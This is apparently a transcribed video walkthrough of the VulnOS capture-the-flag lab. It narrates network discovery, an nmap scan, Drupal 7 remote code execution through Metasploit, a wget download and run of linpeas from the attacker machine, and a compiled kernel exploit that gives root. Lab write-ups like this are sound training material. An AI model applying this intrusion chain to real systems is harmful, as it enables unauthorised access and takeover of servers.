Hi there, this is Akrit. Welcome back to my channel. And this video is going to be walkthrough of VulnOS box. And without wasting any time, let's get started. So first, let's find out the IP address of VulnOS box. So because this Kali Linux box and VulnOS box are in same network, so let's first find out the IP address of this Kali Linux box. If config, so this is the IP address of Kali Linux box. Clear this. So let's use a netdiscover tool to find out the IP address of VulnOS box. Sudo netdiscover hyphen r and the IP address and the mask of the IP address. So this is the IP address of VulnOS box. You can cross verify it by using this MAC address. So let's note it down and let's run an nmap scan to find out what are the service are open on this server. Sudo nmap hyphen sc to run the vulnerability scanning script, hyphen sv to find out the version information of the service, hyphen o to find out the OS information, hyphen p hyphen to scan all the port and IP address of the VulnOS box 192.168.129.120. Hit enter. So looking at the nmap result, there are three port is open. One is port 22, which is SSH service, and port 80, which is HTTP service, and we also have the version information of the Apache. And the last port is 6667, which is IRC port. I don't know much about IRC service. We need to enumerate more on this. So let's enumerate port 80, which is HTTP service, and let's visit this website. So copy this IP address and paste it here. So let's look into the page source. And nothing interesting, and there is a path, right? Let's visit that path. Okay, and if you look at this symbol, this is a Drupal CMS symbol. If you are familiar with Drupal, then you can easily identify this. So Drupal is a CMS, same as WordPress. It provides us several templates to develop the website. And I suspect that this website is built using Drupal CMS. And if you look at the page source, if I search for Drupal keyword, and you can see here, it is using Drupal 7. And also if you are using Vaplizer, so Vaplizer is a Firefox extension which will identify what are the technology being used to develop the particular website. For example, what kind of CMS it is using or what kind of framework it is using. So here you can see that this website is using Drupal 7. So let's search in the search bar to check whether any vulnerability exists for this Drupal version. So search exploit Drupal 7. So these are the possible vulnerability exist in Drupal 7, and it does not mean that all the listed vulnerability exist in our website. We need to check that, right? And our goal is to get the initial access to the server, and our end goal is to root this box, right? So we will more focus on RCE kind of bug, because if there is a RCE, then we can get the initial access to the server. So going through the result. So here is a RCE, right? So let's copy this exploit. You can see search exploit hyphen m, paste the path of the exploit. So let's look into the exploit nano 3515. So here you need a user ID and username. So as of now, we don't have any user ID and username, right? Let's revisit this exploit if we find any user ID and username. So let's look into the next RCE, which is this, right? So let's copy the exploit. Searchploit -m. Yes, let's look into the exploit. So here you can read more about this exploit. And if you go through the code, here you have to specify the URL, that is fine. And here you have to specify the REST API endpoint. But as of now, we didn't find any REST API endpoint, right? Of course, we can do the brute force to find out the REST API endpoint. But let's do that later, because there are many RCE if you look at this result. So let's try every RCE. If we couldn't succeed any of them, then we can revisit this, right? So let's go to this RCE. These three are same vulnerability. These are written in Ruby. And this is the POC. So let's copy this txt file. Searchploit -m. Nano 445. So this is the POC, right? So this is the payload. Let's copy this payload and paste it here. No, we got 404 error, right? So let's change this to 1. We got access denied error. So that means we can't exploit this vulnerability. So let's move to next RCE, which is this, right? Remote code execution. And this is written in Ruby. That means it is present in Metasploit. So let's load the Metasploit. MSF console. And this is the exploit name. Let's copy the name. Search. Okay. So this is the exploit. So let's use that exploit. So let's see what are the parameter we need to set before running this exploit. Show option. So here we need to set our host, which is VulnOS IP address and target URI, and port number it is 80 only for us also. So let's set our host and target URI. Set our host, which is 192.168.129.120, right? Set target URI, which is this, right? So let's run it. Yeah, you can see here meterpreter session 1 open. That means we got a shell. So if I say id, so it will take some time. Yeah, here I have to say shell. Now if I say id, you can see we got an initial access to the VulnOS server. So let's upgrade this shell. Yeah, clear this out. So you have to set the term environment variable. Export term equal to x term. Now clear. Yeah. So let's change the color of this terminal using this command. Hit enter. Okay. So let's hop over to temp folder. So now what I will do, I will transfer the linpeace.sh file to this machine. So basically linpeace.sh is a script which will look for possible privilege escalation vector. So I have linpeace in my Kali box. If you go to desktop, yes. So this is the script. So I have to transfer this linpeace.sh file to VulnOS machine. For that, I will host a simple Python server. So wget http IP address of Kali box 192.168.129.100 and port number and file name. So let's make it as executable. Chmod plus x linpeace.sh. So let's run the script linpeace.sh. So as I explained in previous video, so if anything marked as red yellow, then there is a 95% possibility that we can escalate the privilege. If it is marked as red, we need to cross verify it. So let's go through this result. So here this Linux version is outdated. So here you can see the CVE. Let's copy this CVE. So let's Google it. Exploit DB. Yeah, this is the one. Render. So here you can read more about this exploit. So here there are two files. One is avilso.c and exploit.c. So let's copy this code. Copy. So I will save it to Kali box. Then I can transfer this file to VulnOS machine, right? So nano avilso.c. Paste this code. Save it. So another one is exploit.c. So let's copy this code. Paste it and save it. So let's transfer this avilso.c and exploit.c to VulnOS machine. So wget http 192.168.29.100.8000 avilso.c again wget 29 exploit.c. So here is an instruction how you can compile this binary. So copy this command, paste it here. So this is the warning. Let's ignore the warning. You can copy this command. So it created a exploit binary file. Let's run that exploit binary file. So if I say id, so I am root. So that means we got a root access and we successfully found this box. So it seems like easy box, and I hope you gain some knowledge from this video. So that is all for this video. Until then, stay tuned, like the video and subscribe the channel. Thank you.